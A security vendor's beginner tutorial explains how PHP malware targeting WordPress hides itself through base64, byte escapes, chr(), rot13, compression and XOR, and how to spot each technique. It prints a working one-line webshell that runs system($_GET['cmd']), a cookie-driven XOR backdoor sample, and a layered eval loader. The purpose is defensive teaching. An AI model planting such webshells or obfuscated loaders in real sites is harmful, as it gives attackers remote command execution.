Know your Malware – A Beginner’s Guide to Encoding Techniques Used to Obfuscate Malware
With the launch of Wordfence CLI, our high performance security scanner that can detect the vast majority of PHP malware targeting WordPress, Wordfence continues to emphasize the importance of malware detection and remediation. Malware targeting WordPress uses a variety of obfuscation techniques to avoid detection, and today’s post dives into some of the most common built-in PHP functionality malware often makes use of in order to do this.
What is Obfuscation?
Obfuscation is the process of concealing the purpose or functionality of code or data so that it evades detection and is more difficult for a human or security software to analyze, but still fulfills its intended purpose.
Obfuscation makes use of various types of encoding techniques, but is not exactly the same thing as encoding. There are countless legitimate uses for encoding data, including saving space through compression, transmitting data over a network, and packaging code so that it can be easily interpreted by programs in an expected format. Meanwhile obfuscation is intentionally designed to prevent understanding and detection by humans and security software.
Obfuscation is also different from encryption in that it can typically be reversed without a “key”, though there are some encoding techniques, such as XOR encoding, which do use keys and are used in both encryption and obfuscation.
Encoding Techniques
Since obfuscation often relies heavily on encoding techniques, it’s important to understand what these techniques look like, their typical legitimate use cases, and signs that they’re being used to hide something potentially malicious. In today’s article, we will cover some of the most commonly used encoding techniques, and teach you how to spot legitimate uses as well as potentially suspicious patterns.
Base64 Encoding
What is Base64 encoding?
Base64 encoding is widely used to send and store data. If you’ve ever played with Linux and tried to look at an executable file using the cat command, you might have noticed that your terminal starts acting very strangely. This is because binary data includes an enormous number of potential byte sequences, and software that’s not designed to interpret a particular file format can incorrectly interpret some of these sequences as commands.
Base64 encoding allows any data, including binary data, to be stored and transmitted as text which makes it very convenient for programs to talk to one another without being misunderstood, especially over a network.
It uses 26 lower-case letters, 26 upper-case letters, the digits 0-9, and the ‘+’ and ‘/’ symbols for a total of 64 characters, plus ‘=’ for padding.
Note that, unlike the Base 8 (Octal) and Base 16 (Hexadecimal) encodings we’ll cover later, base64 does not map each byte to a fixed group of characters. Instead, it takes the input three bytes (24 bits) at a time, splits them into four 6-bit values between 0 and 63, and then uses a lookup table to assign a character to each value. You can find out more about this process in the Wikipedia article on Base64 encoding.
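To make the lookup step concrete, here is a minimal sketch that encodes exactly three bytes by hand. The encode_three_bytes helper is our own illustration rather than a PHP built-in, and it ignores padding, which only matters when the input length is not a multiple of three.

```php
<?php
// Illustrative helper (not part of PHP): encodes exactly three bytes by hand.
function encode_three_bytes(string $bytes): string
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

    // Pack the three bytes into a single 24-bit integer.
    $bits = (ord($bytes[0]) << 16) | (ord($bytes[1]) << 8) | ord($bytes[2]);

    // Read the 24 bits back out as four 6-bit indexes into the alphabet.
    $out = '';
    foreach ([18, 12, 6, 0] as $shift) {
        $out .= $alphabet[($bits >> $shift) & 0x3F];
    }
    return $out;
}

echo encode_three_bytes('Hel'), "\n";   // SGVs, the same as base64_encode('Hel')
```

The result matches the first four characters of the encoded “Hello, World!” string shown in the next section.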
How is Base64 Encoding Used Legitimately?
You’ve likely seen base64 encoded data in the past, and it’s very easy to spot – for instance, SGVsbG8sIFdvcmxkIQ==
decodes to “Hello, World!” and you can run the code snippet:
<?php echo base64_decode('SGVsbG8sIFdvcmxkIQ==');
to see this in action.
PHP uses the base64_encode and base64_decode functions to encode and decode Base64-encoded data. Many applications store information in this format as data files or database entries, so the presence of the base64_encode and base64_decode functions in a PHP file is often no cause for concern on its own.
How is Base64 Encoding Used by Malware?
It is significantly less common for base64-encoded data to be hardcoded into a PHP file, especially one that executes it as code.
For example,
<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'));
is a minimalist webshell. The eval function tells PHP to execute whatever is decoded by the base64_decode function as PHP, so once the string of data c3lzdGVtKCRfR0VUWydjbWQnXSk7 is decoded it will execute the statement system($_GET['cmd']); as code.
This uses the system
function to run the contents of the cmd
query string parameter as a terminal command. This means that if this webshell was installed on a site as webshell.php
, an attacker could go to http://victimsite.com/webshell.php?cmd=ls
to run the ls
command and list all files in the directory.
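When you come across a hardcoded string like this, you can inspect it safely by decoding it and printing the result as text instead of executing it. The following is a minimal sketch; the variable names are our own.

```php
<?php
// The hardcoded string from the webshell above.
$payload = 'c3lzdGVtKCRfR0VUWydjbWQnXSk7';

// Strict mode makes base64_decode() return false on invalid input.
// The result is only printed; nothing is passed to eval().
$decoded = base64_decode($payload, true);
echo $decoded, "\n";   // system($_GET['cmd']);
```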
Byte Escape Sequences
What are Byte Escape Sequences?
You might already be familiar with some escape sequences, such as \n
to denote a new line of text, or \t
to denote a tab, but they can also be used to represent binary data.
PHP uses byte escape sequences for this, and they are similar to base64 encoding in that they are a way to represent both text and binary data as text strings.
There are two commonly used byte escape sequence formats used in PHP – Hexadecimal, which uses Base 16, and Octal, which uses Base 8.
Hex encoded byte sequences are represented by \x followed by one or two hexadecimal digits, that is, the digits 0 through 9 and the letters ‘a’ through ‘f’ in either case.
For example, the text “Hello, World!” can be represented as the following escaped sequence:
\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21
Octal byte sequences are represented by ‘\’ followed by a one to three digit number from 0 through 377.
For example, the text “Hello, World!” can be represented as the following escaped sequence:
\110\145\154\154\157\54\40\127\157\162\154\144\41
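If you want to produce or reverse these sequences yourself, the sketch below builds both forms from plain text and expands them again with PHP’s stripcslashes function, which understands C-style hex and octal escapes. The two to_*_escapes helpers are hypothetical names used only for this illustration.

```php
<?php
// Hypothetical helpers for illustration: build escaped forms of a string.
function to_hex_escapes(string $text): string
{
    $out = '';
    foreach (str_split($text) as $char) {
        $out .= sprintf('\\x%02x', ord($char));
    }
    return $out;
}

function to_octal_escapes(string $text): string
{
    $out = '';
    foreach (str_split($text) as $char) {
        $out .= sprintf('\\%o', ord($char));
    }
    return $out;
}

$hex   = to_hex_escapes('Hello, World!');
$octal = to_octal_escapes('Hello, World!');
echo $hex, "\n", $octal, "\n";

// stripcslashes() expands hex and octal escapes found in an ordinary string.
echo stripcslashes($hex), "\n";     // Hello, World!
echo stripcslashes($octal), "\n";   // Hello, World!
```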
If you’ve ever worked with Linux filesystem permissions, you’ve already seen octal notation: a mode such as ‘777’ denotes that all users have permission to read, write, and execute.
PHP also supports unicode escape sequences, which begin with \u followed by a code point in curly braces, and can be used to encode unicode characters used for international languages as well as emojis. While unicode escape sequences can be used to bypass security systems, they are less commonly used in malware, and are beyond the scope of this article. If you’d like to learn more about unicode escape sequences, a good resource can be found here. Note that the article is targeted at JavaScript developers, but provides an excellent overview of the concepts involved.
How are Byte Escape Sequences Used Legitimately?
Byte escape sequences are used to store binary information, and many PHP applications use them to store encryption keys and to perform operations that can be sped up by handling binary data directly. As such they are most often found in code libraries for handling encryption and text manipulation and conversion.
How are Byte Escape Sequences Used by Malware?
PHP has an unusual property: any byte escape sequence surrounded by double quotes (“”) is automatically parsed. Moreover, PHP can interpret any valid combination of text, hex escape sequences, octal escape sequences, and unicode escape sequences in a single string. In other words, “He\x6c\x6c\x6f\54\40\127\157rld!” will be processed by PHP as “Hello, World!”. You can actually test this using the following code snippet:
<?php echo "He\x6c\x6c\x6f\54\40\127\157rld!";
The fact that PHP can easily interpret such sequences but humans usually cannot read them makes byte escape sequences ideal for obfuscation. It is very unusual for legitimate software to use mixed encodings in this manner, and so it is a very strong indicator of malicious activity.
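As a rough illustration of what looking for mixed encodings could mean in practice, the sketch below flags source text that contains both hex and octal escapes. This is a hypothetical heuristic of our own, not a Wordfence signature, and it would produce false positives on real code (for example, on regular expressions that use backreferences such as \1).

```php
<?php
// Hypothetical heuristic, not a Wordfence signature: report whether a piece
// of PHP source text contains both hex and octal escapes.
function mixes_hex_and_octal(string $source): bool
{
    $hasHex   = preg_match('/\\\\x[0-9a-fA-F]{1,2}/', $source) === 1;
    $hasOctal = preg_match('/\\\\[0-7]{1,3}/', $source) === 1;
    return $hasHex && $hasOctal;
}

// Single quotes keep the backslashes literal, as they would appear on disk.
$suspicious = 'echo "He\x6c\x6c\x6f\54\40\127\157rld!";';
$ordinary   = 'echo "Hello, World!\n";';

var_dump(mixes_hex_and_octal($suspicious));   // bool(true)
var_dump(mixes_hex_and_octal($ordinary));     // bool(false)
```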
Character Encoding
What is Character Encoding?
Character encoding is similar to hex encoding, but instead of escape sequences inside a string it uses function calls that each produce a single character. PHP uses the chr function to decode a number between 0 and 255 into a single character, and the ord function to encode a single character back into a numeric value. This is slightly complicated by the fact that the chr function accepts decimal, hexadecimal, and octal formatted numbers, but decimal format is most commonly used.
The following code provides an example of character encoding utilizing chr
, and would output “Hello, World!” when executed:
<?php echo chr(72).chr(101).chr(108).chr(108).chr(111).chr(44).chr(32).chr(87).chr(111).chr(114).chr(108).chr(100).chr(33);
Legitimate use of character encoding is somewhat rare in PHP, though it is occasionally used for text manipulation and inserting control characters such as null bytes in place of hex or octal encoding. It is far more commonly used in languages such as JavaScript where the code is often publicly visible.
One common use case is “reverse obfuscation” where character encoding in JavaScript is used to render an email address on a site in a way that a human can read it once the code is executed, but that older automated tools that can only view the uninterpreted code have difficulty scraping.
How is Character Encoding Used by Malware?
Character encoding is used by malware in almost exactly the same way as byte escape sequences, that is, to make the code more difficult for a human to read and security tools to interpret. It is frequently used by malware to hide malicious URLs that the malware then sends sensitive information to or redirects visitors to.
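A chain of chr calls can be read without running the code it came from. The following is a minimal sketch of a hypothetical analyst helper, decode_chr_chain, that assumes every argument is a plain decimal number; it would misread hexadecimal or octal arguments.

```php
<?php
// Hypothetical analyst helper: collect the numbers from a chain of chr(N)
// calls and return the text they spell, without executing the input.
// Assumes decimal arguments only.
function decode_chr_chain(string $source): string
{
    preg_match_all('/chr\(\s*(\d+)\s*\)/i', $source, $matches);
    $text = '';
    foreach ($matches[1] as $number) {
        $text .= chr((int) $number);
    }
    return $text;
}

$snippet = 'chr(72).chr(101).chr(108).chr(108).chr(111)';
echo decode_chr_chain($snippet), "\n";   // Hello

// ord() goes the other way, from a character back to its number.
echo ord('H'), "\n";                     // 72
```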
Substitution Ciphers (rot13, etc.)
What are Substitution Ciphers?
One of the simplest ways to obfuscate content is to substitute each letter with another letter. Shifting every letter a fixed number of places through the alphabet is known as a Caesar cipher, and many programming languages have a built-in method to do this. The most popular variant, rot13, replaces each letter with the one halfway across the alphabet from it, or 13 steps away. As such, “Hello, World!” becomes “Uryyb, Jbeyq!” The rot13 substitutions can be seen in the following table:
Input:  A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Output: N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
How are Substitution Ciphers Used Legitimately?
It is uncommon for substitution ciphers to be used in well-architected code, but some legitimate software does use them as a workaround when it has issues running in an environment where naive or poorly configured security software might hinder its intended execution, or when a value needs to be stored in a form that won’t be interfered with by code that is looking for that value. In other words, they are almost always used to evade detection of some kind, even by legitimate software.
How are Substitution Ciphers Used by Malware?
Malware frequently uses the str_rot13 function to obfuscate malicious URLs that might be on a blocklist, whether it sends sensitive data to them, redirects visitors to them, or receives commands from them. It is a relatively strong signal of suspicious behavior, though it is not strong enough on its own to mark a file as malicious.
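As a quick illustration of how str_rot13 behaves, the snippet below encodes a harmless string and then applies the function a second time. Because the alphabet has 26 letters, shifting by 13 twice returns the original text, so the same function both hides and reveals a value.

```php
<?php
$encoded = str_rot13('Hello, World!');
echo $encoded, "\n";              // Uryyb, Jbeyq!

// Applying rot13 again restores the original text.
echo str_rot13($encoded), "\n";   // Hello, World!
```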
Compression (gzencoding, zlib encoding, and more)
What is Compression?
Compression refers to the process of compacting data, making it take up less space for storage and less bandwidth for transport. Compression algorithms are fairly complex, though many of them work in part by finding repeated patterns and storing references to them rather than the entire data.
As a very basic example, the text “aaaaabbbccca” could potentially be compressed to “a5b3c3a”. Real compression algorithms are significantly more sophisticated, and there are many other steps involved depending on the type of data being compressed.
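The toy scheme in this example is usually called run-length encoding. Here is a minimal sketch of it; run_length_encode is our own illustrative function, it writes a run of length 1 without a count, and it assumes the input contains no digits.

```php
<?php
// Toy run-length encoder for illustration only; real algorithms such as
// DEFLATE are far more involved. A run of length 1 is written without a count.
function run_length_encode(string $text): string
{
    $out = '';
    $length = strlen($text);
    $i = 0;
    while ($i < $length) {
        // Count how many times the current character repeats.
        $run = 1;
        while ($i + $run < $length && $text[$i + $run] === $text[$i]) {
            $run++;
        }
        $out .= $text[$i] . ($run > 1 ? $run : '');
        $i += $run;
    }
    return $out;
}

echo run_length_encode('aaaaabbbccca'), "\n";   // a5b3c3a
```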
There are a number of commonly used compression algorithms, including ones specifically designed to compress images, movies, and audio files. Media compression algorithms are often “lossy” and do not perfectly reconstruct the original data so much as produce output that looks or sounds similar enough to a human that it’s hard to notice.
In today’s article we are going to focus specifically on the functions most commonly used by PHP to compress and decompress arbitrary data, which use “lossless” compression and can perfectly reconstruct the original data from the archived format.
How is Compression used legitimately?
Most people are familiar with zip files, and many websites use compression to load large amounts of content more quickly while saving money on outbound data transfer. The most common compression algorithms used in PHP are Zlib and Gzip, both of which are handled by the Zlib module, though BZip2 is also fairly common.
Note that Gzip is not exactly the same thing as the zip files you may be familiar with, as it can only compress single files, while modern zip archives can be configured to use many different algorithms including the one used by Gzip. There is a workaround to the single file problem, however: it is very common to combine multiple files into a “tarball” and then compress the combined file using gzip, which is what you are looking at if you’ve ever seen a file with a .tar.gz extension.
Gzip uses an algorithm called “DEFLATE” which tends to be very fast and is often used by web servers to compress outbound data over the network. This process is effectively transparent: if configured correctly, a web server will send out a compressed page and your browser will automatically decompress and load it. The Zlib format wraps the same DEFLATE algorithm in a different header and checksum, while Bzip2 uses a different algorithm that is slower but usually attains higher compression ratios, so it is often used to store archive files.
How is Compression Used by Malware?
Compressed files have a unique advantage for malicious actors – it is difficult to spot particular data in them, especially at high compression ratios. However, they also can’t easily be executed directly in the context of PHP. Compression isn’t limited to just files – any data, including text strings can be compressed. This means that an attacker can use compression to hide their code in a file and uncompress and execute it at runtime using, for instance, the gzinflate
and gzuncompress
functions.
There is one hurdle, however, which is that compressed files contain binary data, that is, data that can’t be directly represented as a text string. One solution to this is to load the compressed data from a separate, appropriately formatted file. Since attackers can often only upload a single file to take control of a site, this can be impractical.
While it is possible to mix string and raw binary data in a single file, reading these separately often requires knowing exactly where in the file everything is, which may be difficult if the file was uploaded or written by exploiting a vulnerability.
Earlier in the article, we discussed ways to safely store binary data in a text string, such as base64 encoding and byte escape sequences. These become significantly more useful to attackers when combined with compression algorithms, and we’ll examine this use case shortly.
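To see why the combination is convenient, the sketch below compresses a harmless string with gzdeflate, wraps the binary result in base64 so it can live inside a text file, and then reverses both steps. It assumes the Zlib extension is available, and the variable names are our own.

```php
<?php
$original = str_repeat('Hello, World! ', 20);

// gzdeflate() returns raw binary, so it is wrapped in base64 to make it
// safe to embed in a text file.
$packed = base64_encode(gzdeflate($original));
echo strlen($original), ' bytes packed into ', strlen($packed), " characters\n";

// Reversing the two steps restores the original exactly.
$restored = gzinflate(base64_decode($packed));
var_dump($restored === $original);   // bool(true)
```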
XOR Encoding
What is XOR Encoding?
XOR (eXclusive OR) is a simple way to mix two sets of data together at the binary level, meaning it operates on the 1s and 0s that make up data. Think of it as a lightweight disguise for data. It takes two bits (a 1 or a 0) and compares them. If the bits are the same, it outputs 0; if they’re different, it outputs 1.
Here’s an example:
0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0
In PHP, you would use the ^ symbol to do an XOR operation between two characters. What actually happens is that the computer looks at the binary form of these characters and does the XOR bit by bit.
For example, the letter ‘A’ in binary is 01000001, and ‘B’ is 01000010. When you XOR them:
01000001
01000010
--------
00000011
You get a jumbled mix of the two. What makes XOR particularly useful is that if you take this result and do the exact same XOR operation on it again with ‘B’, you’ll get back ‘A’.
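The same ‘A’ and ‘B’ example can be reproduced in PHP. This minimal sketch prints the result as hex because the XORd byte is an unprintable control character.

```php
<?php
// XOR between two strings works byte by byte.
$mixed = 'A' ^ 'B';
echo bin2hex($mixed), "\n";   // 03, i.e. binary 00000011

// Applying the same key again undoes the operation.
echo $mixed ^ 'B', "\n";      // A
```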
How is XOR Encoding Used Legitimately?
In practical terms, XOR is used for basic encryption or data masking. It’s fast and doesn’t require a lot of computing power. For example, if you have a secret key that both the sender and receiver know, you could XOR your message with this key to obscure the text before sending it over the internet. The downside to this is that it is usually trivial to find the “key” using statistical analysis, so while XOR encoding is used as part of a much more complex process by many strong encryption schemes, it is not secure encryption on its own.
How is XOR Encoding Used by Malware?
XOR encoding is particularly useful for attackers who want to restrict access to malware, such as webshells, used to control a website. For instance, by making the XOR “key” a value that isn’t present in the malware itself but is passed in by an input parameter, it acts as a password protection mechanism that makes the malware unable to run unless an attacker who knows the key sends a specially crafted request. Likewise, needing the key to deobfuscate the malware makes it much more difficult for security analysts and scanners to identify malicious behavior.
The following malicious file hides the name of a function it depends on behind an XOR operation, and requires commands to be encoded in a specific way before they can be processed. It takes each $_COOKIE value, passes it through the function named by $odqwv, XORs the result against the name of the cookie (repeated to the necessary length), and then calls the decoded values as functions.
<?php $odqwv = "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc" ^ "trhvvbuzeadricgobq"; $mvxr = $_COOKIE; foreach ($mvxr as $q=>$h){ $mvxr[$q] = $odqwv($h) ^ str_pad($q, strlen($h), $q); } $zgas = $mvxr["dj"](); $lo = $mvxr["ayy"] ($zgas); $lo = $lo['uri']; $mvxr["l"] ($zgas, $mvxr["mdcgv"]); require($lo); $mvxr["kxldb"] ($zgas); $mvxr["rfmcipa"]($lo); ?>
This means that any attacker who knows how the file decodes its input can send it commands that have already been XORd against their cookie names and encoded, which will then be reversed and executed.
In this example, $odqwv is the XORd value of \x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc and trhvvbuzeadricgobq which turns out to be “base64_decode.” You can find this value by creating a simple one-liner
<?php $odqwv = "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc" ^ "trhvvbuzeadricgobq"; echo $odqwv;?>
which prints the value. Because PHP treats a string variable followed by parentheses as a call to the function with that name, $odqwv($h) is really base64_decode($h). The string is not itself the XOR key; it is the hidden name of the built-in function. The key for each cookie is the cookie’s own name, which str_pad repeats until it is as long as the cookie value, and PHP’s string XOR stops at the end of the shorter operand.
The value in $_COOKIE["dj"] is thus base64-decoded and XORd against the repeated string ‘dj’, and the result is called as a function, with similar steps occurring throughout the rest of the code.
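Reading the sample’s loop literally, each cookie value passes through the function named by $odqwv (base64_decode) and is then XORd against its own cookie name. The sketch below mirrors that one expression so that a captured cookie could be read without running the malware. The decode_cookie helper and the sample cookie value are hypothetical, made up for this illustration.

```php
<?php
// Hypothetical analyst helper that mirrors the sample's loop body so a
// captured cookie can be read without running the malware.
function decode_cookie(string $name, string $value): string
{
    // Same expression as the sample, with base64_decode written out.
    return base64_decode($value) ^ str_pad($name, strlen($value), $name);
}

// 'Fx4WBgEE' is a harmless value made up for this example.
echo decode_cookie('dj', 'Fx4WBgEE'), "\n";   // strlen
```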
Putting it All Together
Most obfuscated malware uses a combination of these techniques to hide its functionality, and combined techniques are one of the clearest indications of malicious activity. For example, take the following code:
<?php $base64_data = "09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA="; $xor_key = $_GET['k']; $decoded_base64 = base64_decode($base64_data); $inflated_data = gzinflate($decoded_base64); $xor_decoded = $inflated_data ^ str_repeat($xor_key, strlen($inflated_data)); eval($xor_decoded); ?>
If supplied with the correct $xor_key
, it will output “Hello, World!”.
Let’s take a look at how we did this:
First, we took the code ‘echo “Hello, World!”;’ and XOR-encoded it with a key value of ‘K’, resulting in output that renders as .(#$ki.''$gk$9'/jip once its two unprintable control characters are left out.
We then ran it through the gzdeflate function, which results in a binary output that can’t be rendered here, but after base64-encoding that output it turns into the string 09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA= seen in the code above.
If you placed the code in a hello.php
file on your site and accessed it, you’d get a blank screen unless you sent a request to /hello.php?k=K
, which would output “Hello, World!”.
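An analyst who knows or guesses the key can peel the same layers off without executing anything. This minimal sketch repeats the sample’s decoding steps on the string from the example, with the key hardcoded as ‘K’, and prints the hidden code instead of passing it to eval. It assumes the Zlib extension is available.

```php
<?php
$base64_data = '09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA=';
$xor_key     = 'K';   // the key used in the walkthrough above

// Same decoding steps as the sample, in the same order.
$inflated = gzinflate(base64_decode($base64_data));
$revealed = $inflated ^ str_repeat($xor_key, strlen($inflated));

// Print the hidden code as text rather than passing it to eval().
echo $revealed, "\n";   // echo "Hello, World!";
```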
While this example only outputs “Hello, World!” when it is passed the right key, it is trivial to disguise any PHP code in this manner, including destructive code that adds malicious administrators, creates additional malicious files, or alters system settings.
Conclusion
In today’s article, we discussed the most commonly used encoding techniques in PHP, their legitimate applications, and how malicious code uses them to obfuscate its purpose and intent. While obfuscation is an arms race, the Wordfence scanner and Wordfence CLI both use our incredibly effective malware detection signatures and are able to detect the vast majority of obfuscated malware targeting WordPress. This is possible in large part because of our expertise and deep understanding of these encoding techniques and which combinations of encoding tend to indicate malicious behavior. Our experienced security analysts are continuously writing new signatures to improve our detection capabilities.
In a future article, we’ll cover more advanced obfuscation techniques that rely on other properties and quirks of PHP, but it’s necessary to understand basic encoding methods first because of how frequently they’re used, even when they’re not the primary method of obfuscation.
We encourage readers who want to learn more about this to experiment with the various code snippets we have presented. More advanced readers may wish to review public malware repositories in order to better learn to spot these indicators, but be sure to be careful with any actual malware samples you find and only execute them in a virtual environment, as even PHP malware can be used for local privilege escalation on vulnerable machines.
For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.
This article was written by Ramuel Gall, a former Wordfence Senior Security Researcher.